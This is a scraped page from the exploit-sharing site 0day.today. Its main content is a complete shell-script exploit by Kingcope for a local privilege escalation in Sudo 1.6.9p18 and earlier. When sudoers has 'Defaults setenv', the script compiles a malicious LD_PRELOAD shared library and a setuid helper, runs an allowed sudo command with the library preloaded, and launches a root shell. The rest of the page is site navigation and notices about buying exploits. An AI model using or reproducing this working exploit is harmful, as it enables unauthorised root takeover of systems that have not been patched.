0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Sudo <= 1.6.9p18 (Defaults setenv) Local Privilege Escalation Exploit
===================================================================== Sudo <= 1.6.9p18 (Defaults setenv) Local Privilege Escalation Exploit ===================================================================== #!/bin/sh #* Sudo <= 1.6.9p18 local r00t exploit #* by Kingcope/2008/www.com-winner.com # # Most lame exploit EVER! # # Needs a special configuration in the sudoers file: # --->>>>> "Defaults setenv" so environ vars are preserved :) <<<<<--- # # May also need the current users password to be typed in # So this exploit is UBERLAME! # First Argument to this shell file: A program your current # user is allowed to execute via sudo. sudo has to be in # the path!! # successfully tested on FreeBSD-7.0 and RedHat Linux # I don't even know why I realease such stuffz # I'M GONNA GRAB A COFFE NOW;HAVE PHUN !!! echo "Sudo <= 1.6.9p18 local r00t exploit" echo "by Kingcope/2008/www.com-winner.com" if [$1 == ""]; then echo "Please give me a program to run via sudo." echo "Allowed programs:" sudo -l exit fi cat > program.c << _EOF #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { if (!geteuid()) { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); execl("/bin/sh","sh","-c","chown 0:0 /tmp/xxxx; /bin/chmod +xs /tmp/xxxx",NULL); } } _EOF cat > xxxx.c << _EOF int main(void) { setgid(0); setuid(0); // unlink("/tmp/xxxx"); execl("/bin/sh","sh",0); } _EOF gcc -o /tmp/xxxx xxxx.c gcc -o program.o -c program.c -fPIC gcc -shared -Wl,-soname,libno_ex.so.1 -o /tmp/libno_ex.so.1.0 program.o -nostartfiles sudo LD_PRELOAD=/tmp/libno_ex.so.1.0 $1 if [ -f /tmp/xxxx ]; then echo "CONGRATULATIONS, IT'S A ROOTSHELL!" /tmp/xxxx else echo "Sorry, exploit failed. No envvars allowed?" fi # 0day.today [2024-11-15] #